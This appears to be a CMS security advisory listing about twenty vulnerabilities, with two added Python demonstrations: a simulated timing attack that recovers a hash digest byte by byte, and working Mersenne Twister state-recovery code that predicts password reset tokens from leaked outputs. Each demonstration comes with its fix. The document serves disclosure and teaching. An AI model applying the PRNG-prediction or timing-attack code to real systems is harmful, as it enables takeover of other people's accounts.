Security vulnerability announcement: 20121106 - Multiple vectors
Anonymous users can cause an arbitrary Python statement to be run when an administrator accesses the admin interface. The statement cannot break out of the built-in Python sandbox, but it runs with the privileges of that administrator.
A crafted URL can inject arbitrary HTTP headers into the response returned to the user. This can be used to log users out, for example.
The sandbox whitelisting function is accidentally exposed when it is imported from a certain nonstandard location.
Crafted URL allows arbitrary (sandboxed) Python to be run.
Incomplete security declarations on certain objects allow permission checking to be bypassed for some functions.
A crafted URL allows a caller-supplied full response body (or a redirect target) to be returned, because internal methods of the response file handle are accidentally exposed on a URL.
A crafted URL can be used to access a subset of the attributes of unpublished content items, if the content's path is known.
Sandbox escape through a utility function that does not check that its inputs are valid, allowing access to the trusted builtins.
A utility function is callable directly through a crafted URL and accepts a default value.
Crafted URL allows arbitrary (sandboxed) Python to be run.
A method of the membership database is insufficiently protected, allowing users who do not have permission to enumerate users to do so through a crafted URL.
The affected resource causes large amounts of I/O and cache churn when accessed, so repeated requests can be used to deny service to the site.
Denial of service through an exposed utility function.
The batch id change script does not correctly handle anonymous users who attempt to change titles while leaving the ids unchanged. This allows anonymous users to craft a POST request (once they have obtained a valid CSRF token) to change content titles arbitrarily.
BLOBs stored on custom content types can be accessed through a non-standard URL, bypassing the declared permission check.
Users can list the contents of folders that they would otherwise be unable to access (but cannot access the files themselves).
Crafted URLs allow arbitrary strings (including full HTML) to be stored in memory against a key and then read back through a related URL.
Some types of URL can be ambiguous, and the unambiguous form allows anonymous views. On some content types an anonymous view lookup returns a private data structure, which under certain circumstances may be used to read out confidential data.
A specially crafted URL invoking the RSS feed for a folder the user does not have access to (but knows the path of) can cause an infinite loop, tying up a server thread.
The equality test in our authentication system is not constant time, allowing a user with a sufficiently stable, fast connection to the server to check hash prefixes by measuring response times.
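How a non-constant-time comparison lets an attacker check hash prefixes, as an added example that is not code from this advisory or from the affected product. The leaky and constant-time comparison functions, the oracle and the attack loop below are illustrations written for this page: the bytes_examined value stands in for the response time an attacker would measure over a stable, fast connection, stored_hash is a constructed stand-in for whatever credential hash the server holds, and verify_digest shows the standard-library fix.

```python
import hashlib
import hmac


def stored_hash(password: str) -> bytes:
    """Constructed stand-in for the stored credential: a hex digest the server compares against."""
    return hashlib.sha256(password.encode()).hexdigest().encode()


def leaky_equal(expected: bytes, supplied: bytes):
    """Hypothetical naive comparison that bails out at the first mismatching byte.

    Returns (equal, bytes_examined).  bytes_examined is the work done before
    returning, which is what leaks through response time: it grows with the
    length of the prefix the attacker has already got right.
    """
    if len(expected) != len(supplied):
        return False, 0
    examined = 0
    for x, y in zip(expected, supplied):
        examined += 1
        if x != y:
            return False, examined
    return True, examined


def constant_time_equal(expected: bytes, supplied: bytes):
    """Same contract, but the work does not depend on where the bytes differ.

    Every byte is visited and the differences are OR-ed into an accumulator that
    is only inspected at the end.  Digest lengths are public, so the early exit
    on length leaks nothing secret.  Real code should call hmac.compare_digest
    (see verify_digest); this version only makes the shape of the fix visible.
    """
    if len(expected) != len(supplied):
        return False, 0
    acc = 0
    examined = 0
    for x, y in zip(expected, supplied):
        examined += 1
        acc |= x ^ y
    return acc == 0, examined


def verify_digest(expected_hex: str, supplied_hex: str) -> bool:
    """The fix to actually ship: the standard library's constant-time comparison."""
    return hmac.compare_digest(expected_hex.encode(), supplied_hex.encode())


def recover_secret(oracle, length: int) -> bytes:
    """Simulated timing attack.  oracle(guess) -> (equal, bytes_examined).

    For each position every byte value is tried, and the one that makes the
    server do one more byte of work (or accept the guess) is kept.
    """
    known = bytearray()
    for pos in range(length):
        for candidate in range(256):
            guess = bytes(known) + bytes([candidate]) + b"\x00" * (length - pos - 1)
            equal, work = oracle(guess)
            if equal or work > pos + 1:
                known.append(candidate)
                break
        else:
            raise ValueError("no byte value advanced the comparison at position %d" % pos)
    return bytes(known)


def attack(compare_fn, secret: bytes):
    """Run recover_secret against compare_fn; None when the attack gets nowhere."""
    try:
        return recover_secret(lambda guess: compare_fn(secret, guess), len(secret))
    except ValueError:
        return None


if __name__ == "__main__":
    stored = stored_hash("correct horse battery staple")
    print("leaky compare recovered:", attack(leaky_equal, stored) == stored)  # True
    print("constant-time compare recovered:", attack(constant_time_equal, stored))  # None
```

Against leaky_equal the loop recovers the whole 64-character digest in at most 256 guesses per position; against constant_time_equal every guess costs the server the same work, the attacker learns nothing per position, and the attack fails. In practice the measurement is noisy rather than exact, which is why the advisory qualifies the attacker as needing a stable, fast connection: the noise is averaged out by repeating each guess.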
We are using Python's random module (seeded from the system random source) rather than the system random source itself, so in a long-running process it is never reseeded. In addition, our error pages leak random numbers, allowing the state of the PRNG used for password resets to be derived.
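What the leaked random numbers give an attacker, as an added example that is not code from this advisory or from the affected product. Python's random.Random is a Mersenne Twister (MT19937); every 32-bit output is a tempered copy of one of the 624 state words, so 624 consecutive outputs harvested from error pages let an attacker invert the tempering, reconstruct the state and predict the next reset token. VulnerableResetService is a hypothetical stand-in for the flaw, secure_reset_token shows the system random source (random.SystemRandom) that the advisory contrasts it with, and the constants are those of the MT19937 reference implementation.

```python
import random

_MASK32 = 0xFFFFFFFF


def temper(y: int) -> int:
    """MT19937's output transform: each emitted value is one state word, tempered."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & _MASK32


def _undo_right_xor(y: int, shift: int) -> int:
    """Invert y ^= y >> shift, recovering `shift` bits at a time from the top down."""
    result = 0
    for i in range(0, 32, shift):
        block = y & (((_MASK32 << (32 - shift)) & _MASK32) >> i)
        y ^= block >> shift
        result |= block
    return result


def _undo_left_xor(y: int, shift: int, mask: int) -> int:
    """Invert y ^= (y << shift) & mask, recovering `shift` bits at a time from the bottom up."""
    result = 0
    for i in range(0, 32, shift):
        block = y & (((_MASK32 >> (32 - shift)) << i) & _MASK32)
        y ^= (block << shift) & mask
        result |= block
    return result


def untemper(y: int) -> int:
    """Map an observed output back to the state word it was produced from."""
    y = _undo_right_xor(y, 18)
    y = _undo_left_xor(y, 15, 0xEFC60000)
    y = _undo_left_xor(y, 7, 0x9D2C5680)
    return _undo_right_xor(y, 11)


def predict_next(observed) -> int:
    """Return the output that follows the last 624 consecutive 32-bit outputs in `observed`.

    Untempered outputs obey x[k+624] = x[k+397] ^ twist(x[k], x[k+1]) for every k,
    so the window need not line up with the generator's internal index: any 624
    consecutive leaked values will do.
    """
    if len(observed) < 624:
        raise ValueError("need at least 624 consecutive outputs")
    s = [untemper(o) for o in observed[-624:]]
    y = (s[0] & 0x80000000) | (s[1] & 0x7FFFFFFF)
    x = s[397] ^ (y >> 1)
    if y & 1:
        x ^= 0x9908B0DF
    return temper(x)


def predict_many(observed, n: int):
    """Predict n further outputs; each prediction joins the window used for the next."""
    window = list(observed[-624:])
    out = []
    for _ in range(n):
        nxt = predict_next(window)
        out.append(nxt)
        window = window[1:] + [nxt]
    return out


class VulnerableResetService:
    """Hypothetical stand-in for the flaw (not the product's code): one process-wide
    Mersenne Twister, seeded once from the OS and never reseeded, feeds both a value
    that ends up on error pages and the password reset token."""

    def __init__(self):
        self._rng = random.Random()      # seeded from the OS at start-up, then never again

    def error_page_nonce(self) -> int:   # one raw generator output reaches the attacker
        return self._rng.getrandbits(32)

    def reset_token(self) -> int:        # drawn from the very same stream
        return self._rng.getrandbits(32)


def secure_reset_token() -> int:
    """The fix: read the OS entropy source on every call; there is no process state to derive."""
    return random.SystemRandom().getrandbits(32)


def demo(seed=None, skip: int = 7) -> bool:
    """Seed a generator, discard `skip` outputs so the observed window straddles a twist
    boundary, record 624 outputs, and check three predictions against the real outputs."""
    rng = random.Random(seed)
    for _ in range(skip):
        rng.getrandbits(32)
    seen = [rng.getrandbits(32) for _ in range(624)]
    return predict_many(seen, 3) == [rng.getrandbits(32) for _ in range(3)]


if __name__ == "__main__":
    victim = VulnerableResetService()
    leaked = [victim.error_page_nonce() for _ in range(624)]  # harvested from 624 error pages
    print("predicted reset token matches:", predict_next(leaked) == victim.reset_token())  # True
    print("prediction across a twist boundary:", demo(20121106))  # True
```

The attack needs raw 32-bit outputs; where the leaked values come from random.random() instead, each float consumes two generator words (27 and 26 bits), so the untempering has to account for the dropped low bits. Reseeding periodically only narrows the window; the real fix is a non-deterministic source such as random.SystemRandom, whose outputs cannot be inverted from observation.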
A vulnerability in z3c.form leaks the default values of form fields through crafted URLs.